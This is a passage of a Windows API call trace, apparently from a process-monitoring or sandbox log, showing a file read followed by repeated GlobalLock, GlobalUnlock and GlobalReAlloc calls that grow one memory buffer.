[0127.276] ReadFile (in: hFile=0x98, lpBuffer=0x22e0020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x6fa64, lpOverlapped=0x0 | out: lpBuffer=0x22e0020*, lpNumberOfBytesRead=0x6fa64*=0x10be00, lpOverlapped=0x0) returned 1
[0127.315] CloseHandle (hObject=0x98) returned 1
[0127.316] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.316] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.316] GlobalUnlock (hMem=0x35000c) returned 0
[0127.316] GlobalReAlloc (hMem=0x35000c, dwBytes=0x4000, uFlags=0x2) returned 0x35000c
[0127.316] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.317] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.317] GlobalUnlock (hMem=0x35000c) returned 0
[0127.317] GlobalReAlloc (hMem=0x35000c, dwBytes=0x6000, uFlags=0x2) returned 0x35000c
[0127.317] GlobalLock (hMem=0x35000c) returned 0x26a820
[0127.318] GlobalHandle (pMem=0x26a820) returned 0x35000c
[0127.318] GlobalUnlock (hMem=0x35000c) returned 0
[0127.318] GlobalReAlloc (hMem=0x35000c, dwBytes=0x8000, uFlags=0x2) returned 0x35000c
[0127.318] GlobalLock (hMem=0x35000c) returned 0x270830
[0127.319] GlobalHandle (pMem=0x270830) returned 0x35000c
[0127.319] GlobalUnlock (hMem=0x35000c) returned 0
[0127.319] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa000, uFlags=0x2) returned 0x35000c
[0127.319] GlobalLock (hMem=0x35000c) returned 0x270830
[0127.319] GlobalHandle (pMem=0x270830) returned 0x35000c
[0127.319] GlobalUnlock (hMem=0x35000c) returned 0
[0127.319] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc000, uFlags=0x2) returned 0x35000c
[0127.320] GlobalLock (hMem=0x35000c) returned 0x27a840
[0127.321] GlobalHandle (pMem=0x27a840) returned 0x35000c
[0127.321] GlobalUnlock (hMem=0x35000c) returned 0
[0127.321] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe000, uFlags=0x2) returned 0x35000c
[0127.321] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.321] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.321] GlobalUnlock (hMem=0x35000c) returned 0
[0127.321] GlobalReAlloc (hMem=0x35000c, dwBytes=0x10000, uFlags=0x2) returned 0x35000c
[0127.321] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.322] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.322] GlobalUnlock (hMem=0x35000c) returned 0
[0127.322] GlobalReAlloc (hMem=0x35000c, dwBytes=0x12000, uFlags=0x2) returned 0x35000c
[0127.322] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.322] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.322] GlobalUnlock (hMem=0x35000c) returned 0
[0127.322] GlobalReAlloc (hMem=0x35000c, dwBytes=0x14000, uFlags=0x2) returned 0x35000c
[0127.322] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.323] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.323] GlobalUnlock (hMem=0x35000c) returned 0
[0127.323] GlobalReAlloc (hMem=0x35000c, dwBytes=0x16000, uFlags=0x2) returned 0x35000c
[0127.323] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.323] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.323] GlobalUnlock (hMem=0x35000c) returned 0
[0127.323] GlobalReAlloc (hMem=0x35000c, dwBytes=0x18000, uFlags=0x2) returned 0x35000c
[0127.323] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.324] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.324] GlobalUnlock (hMem=0x35000c) returned 0
[0127.324] GlobalReAlloc (hMem=0x35000c, dwBytes=0x1a000, uFlags=0x2) returned 0x35000c
[0127.324] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.324] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.324] GlobalUnlock (hMem=0x35000c) returned 0
[0127.324] GlobalReAlloc (hMem=0x35000c, dwBytes=0x1c000, uFlags=0x2) returned 0x35000c
[0127.324] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.325] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.325] GlobalUnlock (hMem=0x35000c) returned 0
[0127.325] GlobalReAlloc (hMem=0x35000c, dwBytes=0x1e000, uFlags=0x2) returned 0x35000c
[0127.325] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.325] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.325] GlobalUnlock (hMem=0x35000c) returned 0
[0127.325] GlobalReAlloc (hMem=0x35000c, dwBytes=0x20000, uFlags=0x2) returned 0x35000c
[0127.325] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.326] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.326] GlobalUnlock (hMem=0x35000c) returned 0
[0127.326] GlobalReAlloc (hMem=0x35000c, dwBytes=0x22000, uFlags=0x2) returned 0x35000c
[0127.328] GlobalLock (hMem=0x35000c) returned 0x286820
[0127.328] GlobalHandle (pMem=0x286820) returned 0x35000c
[0127.328] GlobalUnlock (hMem=0x35000c) returned 0
[0127.328] GlobalReAlloc (hMem=0x35000c, dwBytes=0x24000, uFlags=0x2) returned 0x35000c
[0127.328] GlobalLock (hMem=0x35000c) returned 0x286820
[0127.329] GlobalHandle (pMem=0x286820) returned 0x35000c
[0127.329] GlobalUnlock (hMem=0x35000c) returned 0
[0127.329] GlobalReAlloc (hMem=0x35000c, dwBytes=0x26000, uFlags=0x2) returned 0x35000c
[0127.331] GlobalLock (hMem=0x35000c) returned 0x2aa830
[0127.331] GlobalHandle (pMem=0x2aa830) returned 0x35000c
[0127.331] GlobalUnlock (hMem=0x35000c) returned 0
[0127.331] GlobalReAlloc (hMem=0x35000c, dwBytes=0x28000, uFlags=0x2) returned 0x35000c
[0127.331] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.332] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.332] GlobalUnlock (hMem=0x35000c) returned 0
[0127.332] GlobalReAlloc (hMem=0x35000c, dwBytes=0x2a000, uFlags=0x2) returned 0x35000c
[0127.332] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.332] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.332] GlobalUnlock (hMem=0x35000c) returned 0
[0127.332] GlobalReAlloc (hMem=0x35000c, dwBytes=0x2c000, uFlags=0x2) returned 0x35000c
[0127.332] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.333] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.333] GlobalUnlock (hMem=0x35000c) returned 0
[0127.333] GlobalReAlloc (hMem=0x35000c, dwBytes=0x2e000, uFlags=0x2) returned 0x35000c
[0127.333] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.333] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.333] GlobalUnlock (hMem=0x35000c) returned 0
[0127.333] GlobalReAlloc (hMem=0x35000c, dwBytes=0x30000, uFlags=0x2) returned 0x35000c
[0127.333] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.334] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.334] GlobalUnlock (hMem=0x35000c) returned 0
[0127.334] GlobalReAlloc (hMem=0x35000c, dwBytes=0x32000, uFlags=0x2) returned 0x35000c
[0127.334] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.334] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.334] GlobalUnlock (hMem=0x35000c) returned 0
[0127.334] GlobalReAlloc (hMem=0x35000c, dwBytes=0x34000, uFlags=0x2) returned 0x35000c
[0127.334] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.335] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.335] GlobalUnlock (hMem=0x35000c) returned 0
[0127.335] GlobalReAlloc (hMem=0x35000c, dwBytes=0x36000, uFlags=0x2) returned 0x35000c
[0127.335] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.335] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.335] GlobalUnlock (hMem=0x35000c) returned 0
[0127.335] GlobalReAlloc (hMem=0x35000c, dwBytes=0x38000, uFlags=0x2) returned 0x35000c
[0127.335] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.336] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.336] GlobalUnlock (hMem=0x35000c) returned 0
[0127.336] GlobalReAlloc (hMem=0x35000c, dwBytes=0x3a000, uFlags=0x2) returned 0x35000c
[0127.336] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.337] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.337] GlobalUnlock (hMem=0x35000c) returned 0
[0127.337] GlobalReAlloc (hMem=0x35000c, dwBytes=0x3c000, uFlags=0x2) returned 0x35000c
[0127.337] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.337] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.337] GlobalUnlock (hMem=0x35000c) returned 0
[0127.337] GlobalReAlloc (hMem=0x35000c, dwBytes=0x3e000, uFlags=0x2) returned 0x35000c
[0127.337] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.338] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.338] GlobalUnlock (hMem=0x35000c) returned 0
[0127.338] GlobalReAlloc (hMem=0x35000c, dwBytes=0x40000, uFlags=0x2) returned 0x35000c
[0127.338] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.338] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.338] GlobalUnlock (hMem=0x35000c) returned 0
[0127.338] GlobalReAlloc (hMem=0x35000c, dwBytes=0x42000, uFlags=0x2) returned 0x35000c
[0127.338] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.339] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.339] GlobalUnlock (hMem=0x35000c) returned 0
[0127.339] GlobalReAlloc (hMem=0x35000c, dwBytes=0x44000, uFlags=0x2) returned 0x35000c
[0127.339] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.339] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.339] GlobalUnlock (hMem=0x35000c) returned 0
[0127.339] GlobalReAlloc (hMem=0x35000c, dwBytes=0x46000, uFlags=0x2) returned 0x35000c
[0127.339] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.340] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.340] GlobalUnlock (hMem=0x35000c) returned 0
[0127.340] GlobalReAlloc (hMem=0x35000c, dwBytes=0x48000, uFlags=0x2) returned 0x35000c
[0127.340] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.340] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.340] GlobalUnlock (hMem=0x35000c) returned 0
[0127.340] GlobalReAlloc (hMem=0x35000c, dwBytes=0x4a000, uFlags=0x2) returned 0x35000c
[0127.340] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.341] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.341] GlobalUnlock (hMem=0x35000c) returned 0
[0127.341] GlobalReAlloc (hMem=0x35000c, dwBytes=0x4c000, uFlags=0x2) returned 0x35000c
[0127.341] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.341] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.341] GlobalUnlock (hMem=0x35000c) returned 0
[0127.341] GlobalReAlloc (hMem=0x35000c, dwBytes=0x4e000, uFlags=0x2) returned 0x35000c
[0127.341] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.342] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.342] GlobalUnlock (hMem=0x35000c) returned 0
[0127.342] GlobalReAlloc (hMem=0x35000c, dwBytes=0x50000, uFlags=0x2) returned 0x35000c
[0127.342] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.342] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.342] GlobalUnlock (hMem=0x35000c) returned 0
[0127.342] GlobalReAlloc (hMem=0x35000c, dwBytes=0x52000, uFlags=0x2) returned 0x35000c
[0127.342] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.343] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.343] GlobalUnlock (hMem=0x35000c) returned 0
[0127.343] GlobalReAlloc (hMem=0x35000c, dwBytes=0x54000, uFlags=0x2) returned 0x35000c
[0127.343] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.343] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.343] GlobalUnlock (hMem=0x35000c) returned 0
[0127.343] GlobalReAlloc (hMem=0x35000c, dwBytes=0x56000, uFlags=0x2) returned 0x35000c
[0127.343] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.344] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.344] GlobalUnlock (hMem=0x35000c) returned 0
[0127.344] GlobalReAlloc (hMem=0x35000c, dwBytes=0x58000, uFlags=0x2) returned 0x35000c
[0127.344] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.344] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.344] GlobalUnlock (hMem=0x35000c) returned 0
[0127.344] GlobalReAlloc (hMem=0x35000c, dwBytes=0x5a000, uFlags=0x2) returned 0x35000c
[0127.344] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.345] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.345] GlobalUnlock (hMem=0x35000c) returned 0
[0127.345] GlobalReAlloc (hMem=0x35000c, dwBytes=0x5c000, uFlags=0x2) returned 0x35000c
[0127.345] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.345] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.345] GlobalUnlock (hMem=0x35000c) returned 0
[0127.345] GlobalReAlloc (hMem=0x35000c, dwBytes=0x5e000, uFlags=0x2) returned 0x35000c
[0127.345] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.346] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.346] GlobalUnlock (hMem=0x35000c) returned 0
[0127.346] GlobalReAlloc (hMem=0x35000c, dwBytes=0x60000, uFlags=0x2) returned 0x35000c
[0127.346] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.346] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.346] GlobalUnlock (hMem=0x35000c) returned 0
[0127.346] GlobalReAlloc (hMem=0x35000c, dwBytes=0x62000, uFlags=0x2) returned 0x35000c
[0127.346] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.347] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.347] GlobalUnlock (hMem=0x35000c) returned 0
[0127.347] GlobalReAlloc (hMem=0x35000c, dwBytes=0x64000, uFlags=0x2) returned 0x35000c
[0127.347] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.347] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.347] GlobalUnlock (hMem=0x35000c) returned 0
[0127.347] GlobalReAlloc (hMem=0x35000c, dwBytes=0x66000, uFlags=0x2) returned 0x35000c
[0127.347] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.348] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.348] GlobalUnlock (hMem=0x35000c) returned 0
[0127.348] GlobalReAlloc (hMem=0x35000c, dwBytes=0x68000, uFlags=0x2) returned 0x35000c
[0127.348] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.348] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.348] GlobalUnlock (hMem=0x35000c) returned 0
[0127.348] GlobalReAlloc (hMem=0x35000c, dwBytes=0x6a000, uFlags=0x2) returned 0x35000c
[0127.348] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.349] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.349] GlobalUnlock (hMem=0x35000c) returned 0
[0127.349] GlobalReAlloc (hMem=0x35000c, dwBytes=0x6c000, uFlags=0x2) returned 0x35000c
[0127.355] GlobalLock (hMem=0x35000c) returned 0x2d0820
[0127.355] GlobalHandle (pMem=0x2d0820) returned 0x35000c
[0127.355] GlobalUnlock (hMem=0x35000c) returned 0
[0127.355] GlobalReAlloc (hMem=0x35000c, dwBytes=0x6e000, uFlags=0x2) returned 0x35000c
[0127.355] GlobalLock (hMem=0x35000c) returned 0x2d0820
[0127.356] GlobalHandle (pMem=0x2d0820) returned 0x35000c
[0127.356] GlobalUnlock (hMem=0x35000c) returned 0
[0127.356] GlobalReAlloc (hMem=0x35000c, dwBytes=0x70000, uFlags=0x2) returned 0x35000c
[0127.369] GlobalLock (hMem=0x35000c) returned 0x1470048
[0127.369] GlobalHandle (pMem=0x1470048) returned 0x35000c
[0127.369] GlobalUnlock (hMem=0x35000c) returned 0
[0127.369] GlobalReAlloc (hMem=0x35000c, dwBytes=0x72000, uFlags=0x2) returned 0x35000c
[0127.375] GlobalLock (hMem=0x35000c) returned 0x14e0058
[0127.376] GlobalHandle (pMem=0x14e0058) returned 0x35000c
[0127.376] GlobalUnlock (hMem=0x35000c) returned 0
[0127.376] GlobalReAlloc (hMem=0x35000c, dwBytes=0x74000, uFlags=0x2) returned 0x35000c
[0127.376] GlobalLock (hMem=0x35000c) returned 0x14e0058
[0127.377] GlobalHandle (pMem=0x14e0058) returned 0x35000c
[0127.377] GlobalUnlock (hMem=0x35000c) returned 0
[0127.377] GlobalReAlloc (hMem=0x35000c, dwBytes=0x76000, uFlags=0x2) returned 0x35000c
[0127.437] GlobalLock (hMem=0x35000c) returned 0x266810
[0127.437] GlobalHandle (pMem=0x266810) returned 0x35000c
[0127.437] GlobalUnlock (hMem=0x35000c) returned 0
[0127.437] GlobalReAlloc (hMem=0x35000c, dwBytes=0x78000, uFlags=0x2) returned 0x35000c
[0127.443] GlobalLock (hMem=0x35000c) returned 0x1470048
[0127.444] GlobalHandle (pMem=0x1470048) returned 0x35000c
[0127.444] GlobalUnlock (hMem=0x35000c) returned 0
[0127.444] GlobalReAlloc (hMem=0x35000c, dwBytes=0x7a000, uFlags=0x2) returned 0x35000c
[0127.450] GlobalLock (hMem=0x35000c) returned 0x14e8058
[0127.451] GlobalHandle (pMem=0x14e8058) returned 0x35000c
[0127.451] GlobalUnlock (hMem=0x35000c) returned 0
[0127.451] GlobalReAlloc (hMem=0x35000c, dwBytes=0x7c000, uFlags=0x2) returned 0x35000c
[0127.451] GlobalLock (hMem=0x35000c) returned 0x14e8058
[0127.452] GlobalHandle (pMem=0x14e8058) returned 0x35000c
[0127.452] GlobalUnlock (hMem=0x35000c) returned 0
[0127.452] GlobalReAlloc (hMem=0x35000c, dwBytes=0x7e000, uFlags=0x2) returned 0x35000c
[0127.466] GlobalLock (hMem=0x35000c) returned 0x23f0048
[0127.466] GlobalHandle (pMem=0x23f0048) returned 0x35000c
[0127.467] GlobalUnlock (hMem=0x35000c) returned 0
[0127.467] GlobalReAlloc (hMem=0x35000c, dwBytes=0x80000, uFlags=0x2) returned 0x35000c
[0127.487] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.488] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.488] GlobalUnlock (hMem=0x35000c) returned 0
[0127.488] GlobalReAlloc (hMem=0x35000c, dwBytes=0x82000, uFlags=0x2) returned 0x35000c
[0127.498] GlobalLock (hMem=0x35000c) returned 0x2680020
[0127.499] GlobalHandle (pMem=0x2680020) returned 0x35000c
[0127.499] GlobalUnlock (hMem=0x35000c) returned 0
[0127.499] GlobalReAlloc (hMem=0x35000c, dwBytes=0x84000, uFlags=0x2) returned 0x35000c
[0127.510] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.511] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.511] GlobalUnlock (hMem=0x35000c) returned 0
[0127.511] GlobalReAlloc (hMem=0x35000c, dwBytes=0x86000, uFlags=0x2) returned 0x35000c
[0127.521] GlobalLock (hMem=0x35000c) returned 0x2680020
[0127.522] GlobalHandle (pMem=0x2680020) returned 0x35000c
[0127.522] GlobalUnlock (hMem=0x35000c) returned 0
[0127.522] GlobalReAlloc (hMem=0x35000c, dwBytes=0x88000, uFlags=0x2) returned 0x35000c
[0127.595] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.596] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.596] GlobalUnlock (hMem=0x35000c) returned 0
[0127.596] GlobalReAlloc (hMem=0x35000c, dwBytes=0x8a000, uFlags=0x2) returned 0x35000c
[0127.607] GlobalLock (hMem=0x35000c) returned 0x2680020
[0127.608] GlobalHandle (pMem=0x2680020) returned 0x35000c
[0127.608] GlobalUnlock (hMem=0x35000c) returned 0
[0127.608] GlobalReAlloc (hMem=0x35000c, dwBytes=0x8c000, uFlags=0x2) returned 0x35000c
[0127.621] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.621] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.621] GlobalUnlock (hMem=0x35000c) returned 0
[0127.621] GlobalReAlloc (hMem=0x35000c, dwBytes=0x8e000, uFlags=0x2) returned 0x35000c
[0127.637] GlobalLock (hMem=0x35000c) returned 0x2680020
[0127.638] GlobalHandle (pMem=0x2680020) returned 0x35000c
[0127.638] GlobalUnlock (hMem=0x35000c) returned 0
[0127.638] GlobalReAlloc (hMem=0x35000c, dwBytes=0x90000, uFlags=0x2) returned 0x35000c
[0127.650] GlobalLock (hMem=0x35000c) returned 0x2710020
[0127.650] GlobalHandle (pMem=0x2710020) returned 0x35000c
[0127.650] GlobalUnlock (hMem=0x35000c) returned 0
[0127.650] GlobalReAlloc (hMem=0x35000c, dwBytes=0x92000, uFlags=0x2) returned 0x35000c
[0127.664] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.665] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.665] GlobalUnlock (hMem=0x35000c) returned 0
[0127.665] GlobalReAlloc (hMem=0x35000c, dwBytes=0x94000, uFlags=0x2) returned 0x35000c
[0127.677] GlobalLock (hMem=0x35000c) returned 0x2690020
[0127.678] GlobalHandle (pMem=0x2690020) returned 0x35000c
[0127.678] GlobalUnlock (hMem=0x35000c) returned 0
[0127.678] GlobalReAlloc (hMem=0x35000c, dwBytes=0x96000, uFlags=0x2) returned 0x35000c
[0127.691] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.692] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.692] GlobalUnlock (hMem=0x35000c) returned 0
[0127.692] GlobalReAlloc (hMem=0x35000c, dwBytes=0x98000, uFlags=0x2) returned 0x35000c
[0127.704] GlobalLock (hMem=0x35000c) returned 0x2690020
[0127.705] GlobalHandle (pMem=0x2690020) returned 0x35000c
[0127.705] GlobalUnlock (hMem=0x35000c) returned 0
[0127.705] GlobalReAlloc (hMem=0x35000c, dwBytes=0x9a000, uFlags=0x2) returned 0x35000c
[0127.719] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.720] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.720] GlobalUnlock (hMem=0x35000c) returned 0
[0127.720] GlobalReAlloc (hMem=0x35000c, dwBytes=0x9c000, uFlags=0x2) returned 0x35000c
[0127.759] GlobalLock (hMem=0x35000c) returned 0x2690020
[0127.760] GlobalHandle (pMem=0x2690020) returned 0x35000c
[0127.760] GlobalUnlock (hMem=0x35000c) returned 0
[0127.760] GlobalReAlloc (hMem=0x35000c, dwBytes=0x9e000, uFlags=0x2) returned 0x35000c
[0127.772] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.773] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.773] GlobalUnlock (hMem=0x35000c) returned 0
[0127.773] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa0000, uFlags=0x2) returned 0x35000c
[0127.786] GlobalLock (hMem=0x35000c) returned 0x2690020
[0127.787] GlobalHandle (pMem=0x2690020) returned 0x35000c
[0127.787] GlobalUnlock (hMem=0x35000c) returned 0
[0127.787] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa2000, uFlags=0x2) returned 0x35000c
[0127.848] GlobalLock (hMem=0x35000c) returned 0x2740020
[0127.849] GlobalHandle (pMem=0x2740020) returned 0x35000c
[0127.849] GlobalUnlock (hMem=0x35000c) returned 0
[0127.849] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa4000, uFlags=0x2) returned 0x35000c
[0127.862] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.863] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.863] GlobalUnlock (hMem=0x35000c) returned 0
[0127.863] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa6000, uFlags=0x2) returned 0x35000c
[0127.877] GlobalLock (hMem=0x35000c) returned 0x26a0020
[0127.877] GlobalHandle (pMem=0x26a0020) returned 0x35000c
[0127.878] GlobalUnlock (hMem=0x35000c) returned 0
[0127.878] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa8000, uFlags=0x2) returned 0x35000c
[0127.938] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.939] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.939] GlobalUnlock (hMem=0x35000c) returned 0
[0127.939] GlobalReAlloc (hMem=0x35000c, dwBytes=0xaa000, uFlags=0x2) returned 0x35000c
[0127.953] GlobalLock (hMem=0x35000c) returned 0x26a0020
[0127.953] GlobalHandle (pMem=0x26a0020) returned 0x35000c
[0127.953] GlobalUnlock (hMem=0x35000c) returned 0
[0127.954] GlobalReAlloc (hMem=0x35000c, dwBytes=0xac000, uFlags=0x2) returned 0x35000c
[0127.968] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0127.969] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0127.969] GlobalUnlock (hMem=0x35000c) returned 0
[0127.969] GlobalReAlloc (hMem=0x35000c, dwBytes=0xae000, uFlags=0x2) returned 0x35000c
[0128.030] GlobalLock (hMem=0x35000c) returned 0x26a0020
[0128.031] GlobalHandle (pMem=0x26a0020) returned 0x35000c
[0128.031] GlobalUnlock (hMem=0x35000c) returned 0
[0128.031] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb0000, uFlags=0x2) returned 0x35000c
[0128.046] GlobalLock (hMem=0x35000c) returned 0x2750020
[0128.047] GlobalHandle (pMem=0x2750020) returned 0x35000c
[0128.047] GlobalUnlock (hMem=0x35000c) returned 0
[0128.047] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb2000, uFlags=0x2) returned 0x35000c
[0128.063] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.064] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.064] GlobalUnlock (hMem=0x35000c) returned 0
[0128.064] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb4000, uFlags=0x2) returned 0x35000c
[0128.126] GlobalLock (hMem=0x35000c) returned 0x26b0020
[0128.127] GlobalHandle (pMem=0x26b0020) returned 0x35000c
[0128.127] GlobalUnlock (hMem=0x35000c) returned 0
[0128.127] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb6000, uFlags=0x2) returned 0x35000c
[0128.144] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.144] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.144] GlobalUnlock (hMem=0x35000c) returned 0
[0128.144] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb8000, uFlags=0x2) returned 0x35000c
[0128.161] GlobalLock (hMem=0x35000c) returned 0x26b0020
[0128.161] GlobalHandle (pMem=0x26b0020) returned 0x35000c
[0128.161] GlobalUnlock (hMem=0x35000c) returned 0
[0128.161] GlobalReAlloc (hMem=0x35000c, dwBytes=0xba000, uFlags=0x2) returned 0x35000c
[0128.224] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.225] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.225] GlobalUnlock (hMem=0x35000c) returned 0
[0128.225] GlobalReAlloc (hMem=0x35000c, dwBytes=0xbc000, uFlags=0x2) returned 0x35000c
[0128.241] GlobalLock (hMem=0x35000c) returned 0x26b0020
[0128.242] GlobalHandle (pMem=0x26b0020) returned 0x35000c
[0128.242] GlobalUnlock (hMem=0x35000c) returned 0
[0128.242] GlobalReAlloc (hMem=0x35000c, dwBytes=0xbe000, uFlags=0x2) returned 0x35000c
[0128.305] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.306] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.306] GlobalUnlock (hMem=0x35000c) returned 0
[0128.306] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc0000, uFlags=0x2) returned 0x35000c
[0128.323] GlobalLock (hMem=0x35000c) returned 0x26b0020
[0128.324] GlobalHandle (pMem=0x26b0020) returned 0x35000c
[0128.324] GlobalUnlock (hMem=0x35000c) returned 0
[0128.324] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc2000, uFlags=0x2) returned 0x35000c
[0128.339] GlobalLock (hMem=0x35000c) returned 0x2780020
[0128.340] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0128.340] GlobalUnlock (hMem=0x35000c) returned 0
[0128.340] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc4000, uFlags=0x2) returned 0x35000c
[0128.403] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.404] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.404] GlobalUnlock (hMem=0x35000c) returned 0
[0128.404] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc6000, uFlags=0x2) returned 0x35000c
[0128.421] GlobalLock (hMem=0x35000c) returned 0x26c0020
[0128.422] GlobalHandle (pMem=0x26c0020) returned 0x35000c
[0128.422] GlobalUnlock (hMem=0x35000c) returned 0
